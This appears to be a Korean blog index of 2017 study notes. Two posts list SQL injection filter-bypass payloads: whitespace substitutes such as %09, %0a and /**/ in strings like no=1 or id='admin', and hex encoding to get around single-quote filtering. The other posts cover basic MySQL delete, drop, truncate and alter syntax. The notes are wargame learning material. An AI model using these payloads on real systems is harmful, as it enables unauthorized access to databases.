C. 웹/개념7 [WEB] SQL injection 공백 우회 공백(WHITE SPACE) 우회 1. Tab : %09 - no=1%09or%09id='admin' 2. Line Feed (\n): %0a - no=1%0aor%0aid='admin' 3. Carrage Return(\r) : %0d - no=1%0dor%0did='admin' 4. 주석 : /**/ - no=1/**/or/**/id='admin' 5. 괄호 : () - no=(1)or(id='admin') 6. 더하기 : + - no=1+or+id='admin' 2017. 8. 3. [WEB] SQL Injection 싱글 쿼터 우회 싱글 쿼터( ' ) 가 필터링 되어있을 때는 어떻게 인젝션을 진행할까 LOS문제를 풀면서 알게 되었다. => 0x, 0b를 사용해서 16진법, 2진법으로 치환함으로써 대신할 수 있다. ex) 'admin' = 0x2761646d696e27 문자열을 hex코드로 바꾸고 앞에 0x를 붙이면 간단하게 끝! 2017. 8. 3. [WEB] MYSQL delete, drop, truncate의 차이 공부를 하다가 delete와 drop의 차이가 무엇인지 명확히 구분하고 싶어 찾아보는데 삭제하는 쿼리중에 truncate라는 것도 있었다. ◎delete 그 안의 데이터를 지운다. 그러나 지우기 전에 가지고 있던 용량은 그대로이다. ◎truncate delete처럼 그 안의 데이터를 다 날려버리는데 처음 create 했던 것 처럼 만들어서 용량이 줄어든다. ◎drop그냥 테이블 자체를 지워버린다. 2017. 7. 24. [WEB] MYSQL 수정,삭제 쿼리 ▷테이블 칼럼 추가 ex) alter table 테이블명 add 칼럼명 varchar(10) not null default '0'; ▷테이블 칼럼 삭제ex) alter table 테이블명 drop 칼럼명; ▷칼럼명과 타입 수정하기ex) alter table 테이블명 change 원래칼럼명 바꿀칼럼명 varchar(10); ▷칼럼 타입 수정하기ex) alter table 테이블명 modify 칼럼명 varchar(10); ▷테이블명 수정ex) alter table 테이블명 rename 바꿀 테이블명; ▷데이터 변경하기ex) update 테이블명 set 칼럼명='바꿀내용' wherer 타겟 칼럼명 ='타겟 칼럼데이터'; ▷특정 칼럼 안에 있는 값만 삭제ex) delete from 테이블명 where 칼럼명;.. 2017. 7. 24. 이전 1 2 다음 반응형